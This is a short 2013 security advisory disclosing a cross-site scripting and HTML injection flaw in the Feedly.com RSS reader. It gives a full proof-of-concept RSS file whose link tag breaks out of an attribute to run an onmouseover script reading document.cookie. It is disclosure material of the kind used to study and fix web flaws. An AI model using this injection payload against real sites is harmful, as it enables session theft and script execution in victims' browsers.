Feedly.com suffers from cross site scripting vulnerability that can be injected via a malicious RSS feed.
97a62552bc6341353fdb589f230aeb8974ed991a01bbafb2666d81a597e91a72
* Feedly.com HTML Injection and XSS Vulnerability RSS feed
* ========================================================
*
* Site: http://feedly.com
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
* Follow me: http://www.linkedin.com/in/andreamenin
*
* ========================================================
Report-Timeline:
----------------
2013-07-02: Reported to domain's tech contact
Introduction:
-------------
Feedly.com is an RSS feed reader, once you sign up (local account
or google auth) you can add, also by typing URL, RSS Feeds from your
preferred web sites.
Description:
------------
I found this XSS Vulnerability and HTML Injection by adding a fake RSS, with a
JavaScript "injection" inside the tag <link>. I've see that Feedly.com
doesen't escape/sanitize the "quotes" inside this tag...
so, i've put something like this:
<link>http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a></link>
Full RSS "Exploit" with injection on tag <link>:
------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
<item>
<title>Test XSS Vulnerability</title>
<link>http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a></link>
<pubDate>Sun, 2 Jul 2013 22:56:41 GMT</pubDate>
<description>XSS TEST, yuk!</description>
</item>
</channel>
</rss>
Screenshot XSS Vulnerability:
-----------------------------
http://goo.gl/fs2Vg
CREDITS:
---------
This vulnerabilities has been discovered
by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
LEGAL NOTICES:
---------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.